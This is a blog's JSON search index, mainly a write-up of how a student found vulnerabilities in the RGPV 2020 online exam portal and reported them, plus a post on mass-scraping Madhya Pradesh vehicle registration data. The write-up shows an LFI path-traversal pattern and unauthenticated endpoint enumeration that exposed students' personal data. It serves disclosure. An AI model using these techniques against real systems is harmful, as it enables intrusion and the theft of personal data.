[{"content":"preface the main reason behind this blog is to understand the seriousness of mistakes that were made without any proper arrangements and the impact of such mistakes. in this blog, i\u0026rsquo;ll be covering how the rgpv exam portal was so vulnerable that it exposed around 49 thousands of students\u0026rsquo; private data/submissions publicly and how it could have ruined everyone\u0026rsquo;s exam without any authentication.\nimpact of given vulnerabilities include:\n49,000 students of rgpv student data leak which includes all possible pii data (like: phone number, email, etc) question paper leak submit exam for any other student unlimited image upload to their server lfi exploit which allows you to see file content from their server view all student submission like question answered from final exams which held during 24th aug - 27th aug 2020 introduction after covid-19 pandemic started, rgpv university announced that for final year students, they are planning to organize an exam which will consist of mcq questions (total 40 questions) and it will be an open book exam as mentioned here. this process started by taking two mock exams to test if things are good or not, and then having the final paper from the 24th of august till the 1st of september 2020.\nnow with given information, rgpv decided to create one exam portal for us, which was handled by eduvita. they started registration and creation of portal at rgpvexam.in. how the overall exam process was figured out is by having one unique url for every student assigned, which allows for that particular student to give an exam.\nstep towards testing exam portal during the first day of the exam, there were many issues where it was returning: network error. the full story can be found here which shows that there were technical difficulties and i also faced this issue.\nnow being a computer science engineer, i was already curious about this scenario, and as of my first step, i started with the debugger tool and investigated what was happening. at first, i encountered one debugger state which they initialized in their index.html file, which avoids people to debugging their javascript code. if you are curious, read this here.\nsidebar this is some content in the sidebar.\non bypassing this, i observed my network tab and found that there was a 504 error returned, as shown in the image.\nsidebar this is some content in the sidebar.\nnow as of the next step, i was more interested in knowing if their website is vulnerable or not? this curiosity leads me to use the nmap tool, i started one vulnerability check script, and after 5 min, there were two exploits which i found:\nhttp-phpmyadmin-dir-traversal: php file inclusion vulnerability which allows remote attackers to include local files via the redirect parameter, possibly involving the subform array. http-vuln-cve2011-3192: vulnerable to a denial of service attack when numerous overlapping byte ranges are requested. the second vulnerability was more towards ddos attack, but the first vulnerability was shocking, as it was an lfi exploit (local file inclusion). to confirm the hypothesis, i tested it by traversing random directory, and after 8 - 10 attempts, i was able to test it by:\n\u0026lt;base_url\u0026gt;/index.php/?p=../../../\u0026lt;any_file_name\u0026gt;\nimpact: allows anyone to access local files directory, which includes any file like environment keys, logs, or any sensitive data.\nunderstanding tech stack before moving ahead, i started by exploring their tech-stack, and with a little bit of exploration, i found out that they are using:\nfrontend - angular js backend - express web server - nginx database - mongodb with given knowledge, i went ahead observing their api structure and started messing around with it. at first, i send one random post request, and on the response i got:\nthis was my first red flag that things are not right because, in production, it\u0026rsquo;s not a good practice to show error stack. later on, the webserver went down so i had to call it a day.\nthe next day, i repeated the vulnerability test, and i found that lfi exploit is no longer present, which is an improvement. (lfi was there till 24th of august 2020).\non my coming paper 26th august 2020, i was prepared for further testing, i started capturing all the networks request happening and noted down all the endpoints and their content. so for a typical exam in rgpv exam portal, things were like:\ncheck otp: \u0026lt;base_url\u0026gt;/common/student/urlcheck check dob/fathers name: \u0026lt;base_url\u0026gt;/common/student/checkdob upload photograph: \u0026lt;base_url\u0026gt;/common/student/checkexamconfig confirm profile: \u0026lt;base_url\u0026gt;/common/student/confirmprofile waiting phase: \u0026lt;base_url\u0026gt;/common/student/checkexamconfig exam started: \u0026lt;base_url\u0026gt;/common/paper/\u0026lt;exam_code\u0026gt; exam submission: \u0026lt;base_url\u0026gt;/common/paper/\u0026lt;exam_code\u0026gt; problem with all these steps is that except step 1 and 3, each post request to an endpoint needs only enrollment_no as their body to get a response which is worrying because ideally there has to be jwt token used in a header which acts as an authentication.\nimpact given you have any person enrollment_no which exist in their database, anyone can:\n1. question paper leak get full question paper in json format as a response. it includes all question list and answer list.\n2. create/update/delete exam submission as explained above, with the enrollment number, anyone can overwrite the submission of another student easily without any authentication.\n3. upload image without auth as of the third step, which is uploading your photo through webcam. from the client-side, it captures an image and requests to backend endpoint with only file content without any authentication. so, in reality, anyone can upload any image to the given endpoint and spam given aws s3 server with their cat photos.\n4. minor data leak as of the fourth step, it is just a confirmation page which takes enrollment_no and responds with:\nname ip address institute name reverse engineering frontend understanding compiled angular js code is quite painful, but i was pretty much interested in all the endpoints registered in the code. as of the first step, i saved rgpvexam.in page and checked out their js code by making it prettify and finding \u0026ldquo;http.post\u0026rdquo; in code. once i understood their code i found all possible endpoint registered over there:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 checkurl(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) } checkdob(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/checkdob`, { query: e }) } checkexamconfig(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/checkexamconfig`, { query: e }) } confirmprofile(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/confirmprofile`, { query: e }) } getresult(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/getresult`, { query: e }) } getquestions(t, e) { return this.http.post(`${this.baseurl}/paper/${t}`, e) } updateresult(t, e) { return this.http.post(`${this.baseurl}/paper/updateresult/${t}`, { query: e }) } updateseen(t, e) { return this.http.post(`${this.baseurl}/paper/updateseen/${t}`, { query: e }) } updateanswered(t, e) { return this.http.post(`${this.baseurl}/paper/updateanswered/${t}`, { query: e }) } getdata(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) } searchdata(t, e = {}, n = 1, i = 10) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { query: e }) } createdata(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { doc: e }) } updatedata(t, e, n) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { doc: n }) } deletedata(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { id: e }) } maillink(t) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) } mailotp(t) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) } checkotp(t, e) { return this.http.post(`${this.baseurl}/${t}/urlcheck`, { enrollment_no: t }) } uploadfile(t) { const e = new formdata; return e.append(\u0026#34;file\u0026#34;, t, t.name), this.http.post(dc.url + \u0026#34;/api/file/uploadstudentimage\u0026#34;, e, { reportprogress: !0, observe: \u0026#34;events\u0026#34; }) } uploadface(t, e) { const n = new formdata; return n.append(\u0026#34;file\u0026#34;, e, e.name), this.http.post(dc.url + \u0026#34;/api/file/uploadface/\u0026#34; + t, n, { reportprogress: !0, observe: \u0026#34;events\u0026#34; }) } this confirms that all endpoints were using enrollment_no as their identifier without any authentication.\nbackend once i knew about all the endpoints, it was time to test other endpoints as well which were not mentioned in the frontend code. this is where i started experimenting with random endpoints because there has to be something out there.\none thing which is repetitive in each endpoint was:\n\u0026lt;base_url\u0026gt;/common/\u0026lt;something\u0026gt;\nwhere something is either student or paper, but for testing, i tried some random string like \u0026ldquo;table\u0026rdquo; and the response was a bit shocking as shown in the image.\nhere, \u0026ldquo;table not found\u0026rdquo; means that anything after /common/ will count as table name and it will return all data present for that table.\ni started with multiple strings like \u0026ldquo;exam\u0026rdquo;, \u0026ldquo;user\u0026rdquo; or anything sensitive and then i found multiple table name which was present.\nto show how serious is this, anyone with bad intention might have written a script with common table names and might have spammed a given endpoint to extract every single data from a given table.\nimpact: given vulnerability existed till 28th of august 2020 which includes mock tests and two final exams for all possible branch\n1. /common/student reveals 49 thousand student information present in the database who registered for the rgpv exam portal and this includes every pii which rgpv has (like dob, ip, phone_no, email, etc) including unique id, otp which was meant to be safely stored by each student and much more.\nin general, the privacy of every student was compromised and no one knows how many of them extracted all the given data and might have sold this or using it for marketing purposes.\n2. /common/result reveals every student submission, this submission includes all answers given for the given question and at which time, which question was seen, and more.\nin short, anyone will know which student gave which exam with how much correctness and how much time was taken.\n3. /common/institute all institute with their id and name present in db. this was not much helpful in revealing sensitive data but not good to share.\nconclusion this whole process of organizing the final exam is rushed heavily because of which i found multiple vulnerabilities. i found lfi and data breach in every possible way, our privacy of around 49 thousand students\u0026rsquo; data was compromised by the exam portal. problem is that the given mistake is not reversible, the damage is already done but thanks to rgpv that they realized this later on and fixed this problem.\nwhat i did from my end? as soon as i found out about these exploits, i approached almost all possible contacts:\nrgpv - no reply from \u0026ldquo;rgpvexam2020@rgtu.net\u0026rdquo; nciipc - got reply + sent report aicte - no reply for minor questions, i approached via telegram but no response over there as well.\nwhat\u0026rsquo;s next? as of 28th of august 2020, we were notified in telegram channel that:\nin short, some security updates were made but what exactly was it is still unknown in the given message but i believe they should have at least mentioned as if what sort of mess they created to start with. but there are still a few things which need improvement.\nfrom my end, once i saw the message, i quickly saw all api endpoints again, and finally, those exploits are gone. now getting student\u0026rsquo;s data or any table data is not possible so that is fixed. the whole process of examination is introduced with the jwt token. so once the user enters with a unique url and confirms dob and father\u0026rsquo;s name, then one jwt token is returned and used in the future endpoint. so this is great news for everyone.\nbut now the real question remains, is this the solution? technically yes, but what about the damage which already happened, still data is already leaked, because otp of each user is already leaked so we all are still exposed.\nhaving no authentication mechanism to start with and introducing it, later on, is an improvement, but why are we compromising this in such a larger audience platform? and who will be responsible for this? now this is something which is still unknown\n","date":"2024-06-30","permalink":"https://shashank-sharma.xyz/posts/how-vulnerable-was-rgpv-exam-2020/","summary":"Preface The main reason behind this blog is to understand the seriousness of mistakes that were made without any proper arrangements and the impact of such mistakes. In this blog, I\u0026rsquo;ll be covering how the RGPV Exam portal was so vulnerable that it exposed around 49 thousands of students\u0026rsquo; private data/submissions publicly and how it could have ruined everyone\u0026rsquo;s exam without any authentication.\nImpact of given vulnerabilities include:\n49,000 students of RGPV student data leak which includes all possible PII data (like: phone number, email, etc) Question paper leak Submit exam for any other student Unlimited image upload to their server LFI Exploit which allows you to see file content from their server View all student submission like question answered from final exams which held during 24th Aug - 27th Aug 2020 Introduction After Covid-19 pandemic started, RGPV University announced that for final year students, they are planning to organize an exam which will consist of MCQ questions (total 40 questions) and it will be an open book exam as mentioned here.","title":"how vulnerable was rgpv exam 2020"},]
[{"content":"preface testing\n","date":"2024-06-30","permalink":"https://shashank-sharma.xyz/microblog/test-micro-blog/","summary":"Preface Testing","title":"test micro blog"},]
[{"content":" introduction python is really a powerful language and with proper use of it anyone can make beautiful things. after studying python i was really impressed by its power and to be more specific i really love how we can scrape any website easily with the help of python. scraping is a process of extracting data from website by their html data. so i learned its basic and started scraping many website.\nrecently i thought of creating something big through scraping but i was having no idea what to do. then i came across with the site of mp transportation and i realized that they got so many data inside there website. the website is very simple, you open the site enter your transport number details and then search it. then you will get result about your transport vehicle which includes type, color etc.\nwith python2.7 i created one script to scrape because with python 3.x there were less support to some modules. i decided to go for \u0026rsquo;last\u0026rsquo; search type because with others i was facing some issues (may be site problem). for this i will have to search each input from 0000 - 9999 in short it makes around 10000 requests. we took 4 digits because it requires min 4 characters to enter. so yeah it was this large.\ni created one program and started scrapping but then with 0000 input and \u0026rsquo;last\u0026rsquo; type search i found that it scraped successfully and i got 1700+ data. but the problem was that it took 5 minutes to scrape 1 request. this happened because of server delay. it was not my problem but it was server\u0026rsquo;s problem to search this much data from database. after realizing this i did some maths.\nif 1 request take = 5 minutes, then, 10000 requests = 50000 minutes = 833.33 hours = 35 days approx = 1 month 4 days\nso in short i need my laptop to run forย 1 month and 4 daysย to run continuously and trust me it\u0026rsquo;s really a bad idea to do so. but is it worth doing it ?\nif 1 request is giving approx 1000 data 10000 requests = 10,000,000\nso yeah, hypothetically inย 35 days i will be able to achieve 10 millions of data. but still being a programmer we must do stuff as fast as possible and to achieve this one thing is sure that i need some power, memory, security etc. i tried multiprocessing and multi threading but it was not working as expected\nso the solution for this problem was getting your hand on some free servers. so i started searching some free website host company which supports python and thought of deploying my script over there. i tried this in pythonanywhere.com and in heroku with the help of flask framework but there was no success. i waited almost 15 days to decide what to do. later i found one site scrapinghub.com which lets you deploy spider on cloud and rest they will take care of that so i went for it and started learning it.\nafter that i learned how to use scrapy and scrapinghub and i created another new program to scrape website with the help of scrapy spiders. source code for this is at the end of this page\nexperiment day 1 - 4,092,328 (4 millions of data in 17 hours) id1 - items - 1,134,421 (15 hours)\nid2 - items - 1,025,282 (17 hours)\nid3 - items - 983,367 (14 hours)\nid4 - items - 949,228 (13 hours)\nsize - 1.3 gb day 2 - 6,498,462 (6.4 millions of data in 17 hours)\n(created 2 more id\u0026rsquo;s to boost my process)\nid1 - items - 1,241,643 (17 hours)\nid2 - items - 1000308 (15 hours)\nid3 - items - 962863 (15 hours)\nid4 - items - 1052844 (15 hours)\nid5 - items - 1144686 (16 hours)\nid6 - items - 1096118 (15 hours)\nsize - 2.4 gb\nfinal result total data collected: 10,590,790 total size: 3.7 gb\ntime consumed: 34 hours\nin just 34 hours by scraping we collected 10 millions of data which was estimated earlier. if we tried to do this process in old fashion like in laptop then it would have taken 1 month so we optimized it.\ndata analysis the main question arises is what to do with data ? which tools to use while analyzing. since the size of our json files are huge. if we will be able to convert json file to database file then it would be really great but doing this will again require loads of time.\nfrom json to database\nwe can do 5 data per second,\nfor 10,000,000 = 2,000,000 seconds = 33333 minutes = 555 hours = 23 days.\nnow that thing is not possible.\ni tried even doing it through sql script which is much better as compare to the previous script but still it will also take approx 20 days.\nso we will use these data in json format, load it into python script and then do our maths over there. loading one file may take approx 10 minutes but time is not an issue. the problem is thatย loading json file in python takes so much of memory.ย i mean a lot and since we are working on normal laptop then we need to think of something else. to avoid such problem i used ijson module in python. its really a handy tool which iterates over json data rather than loading it all of sudden. but again with this power we need to sacrifice time a little but still its worth it.\nstats in which state maximum transport is there ?\nindore - 1625663 bhopal - 1023054 jabalpur - 589875 gwalior - 477625 ujjain - 371559 sagar - 272974 chhindwara - 268971 ratlam - 258581 rewa - 242377 dewas - 240930 link:\u0026nbsp;https://plot.ly/~shashank-sharma/19/\nwhich color does people prefer while buying any transport vehicle ?\nblack - 2137200 red - 683663 not specify - 560975 blue - 341134 grey - 288952 white - 283631 silver - 255836 rbk - 238896 p black - 177379 pbk - 168518 link:\u0026nbsp;https://plot.ly/~shashank-sharma/11/\nwhich company have its maximum vehicle in mp ?\nhero honda motors - 2032369 bajaj auto ltd - 1677867 hero moto corp ltd. - 1563023 tvs motor co. ltd. - 1130974 honda mcy \u0026amp; scooter p i ltd - 1102624 mahindra \u0026amp; mahindra ltd - 463175 tata motors ltd - 280684 maruti suzuki india limited - 258392 maruti udyog ltd - 249949 escorts ltd - 139231 link:\u0026nbsp;https://plot.ly/~shashank-sharma/13/\nin which year does maximum vehicle were issued ?\n2016 - 1406802 2014 - 1392520 2015 - 1166079 2013 - 964026 2011 - 845374 2012 - 734092 2010 - 716772 2009 - 607693 2008 - 481315 2007 - 471963 link:\u0026nbsp;https://plot.ly/~shashank-sharma/15/\nwhich transport vehicle is in majority ?\nsplendor plus - 325878 platina - 302537 hf deluxe self cast wheel - 254166 activa (ele auto \u0026amp; kick start) - 216252 tvs star city - 210397 cd dlx - 188885 discover dts - si - 180193 passion pro(drm-slf castwheel) - 163088 activa 3g eas ks cbs bs3 - 162542 passion plus - 146584 link:\u0026nbsp;https://plot.ly/~shashank-sharma/17/\nwhat type of vehicle does people have in majority ?\nmotor cycle - 6531708 scooter - 1291932 motor car - 881930 tractor - 687360 goods truck - 210932 moped - 197450 omni bus for private use - 142478 auto rickshaw passenger - 124051 trolly - 111358 pick up van - 95238 link:\u0026nbsp;https://plot.ly/~shashank-sharma/9/\nand that's how many more questions can be solved with the given data.\nthank you for reading till the end of this page. i hope by now you realized the real power of python.\nsource code:\u0026nbsp;https://github.com/shashank-sharma/mp-transportation-analysis\n","date":"2017-04-16","permalink":"https://shashank-sharma.xyz/posts/india-mp-transportation-analysis/","summary":"Introduction Python is really a powerful language and with proper use of it anyone can make beautiful things. After studying Python I was really impressed by its power and to be more specific I really love how we can scrape any website easily with the help of python. Scraping is a process of extracting data from website by their html data. So I learned its basic and started scraping many website.\nRecently I thought of creating something big through scraping but I was having no idea what to do.","title":"india's mp transportation analysis through python"},]
[{"content":"what i do? software engineer at coursera got something to discuss? drop me a mail at: shashank.sharma98@gmail.com","date":"0001-01-01","permalink":"https://shashank-sharma.xyz/about/","summary":"What I do? Software Engineer at Coursera Got something to discuss? Drop me a mail at: shashank.","title":"about"},]
[{"content":"๐ personal link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐จ tools link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐บ blog link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐ documentation bookmark item one https://bookmark-item-one.com bookmark item two https://bookmark-item-two.com bookmark item three https://bookmark-item-three.com ","date":"0001-01-01","permalink":"https://shashank-sharma.xyz/nav/","summary":"๐ Personal link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐จ Tools link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐บ Blog link1 link2 link3 link4 link5 link6 link7 link8 link9 ๐ Documentation bookmark item one https://bookmark-item-one.com bookmark item two https://bookmark-item-two.com bookmark item three https://bookmark-item-three.com ","title":"navigation"},]
โ
- ๆ่ฟๆดๆฐ โญ
๐ Personal
link1 | link2 | link3 | link4 | link5 |
link6 | link7 | link8 | link9 |
๐จ Tools
link1 | link2 | link3 | link4 | link5 |
link6 | link7 | link8 | link9 |
๐บ Blog
link1 | link2 | link3 | link4 | link5 |
link6 | link7 | link8 | link9 |
๐ Documentation
- bookmark item one https://bookmark-item-one.com
- bookmark item two https://bookmark-item-two.com
- bookmark item three https://bookmark-item-three.com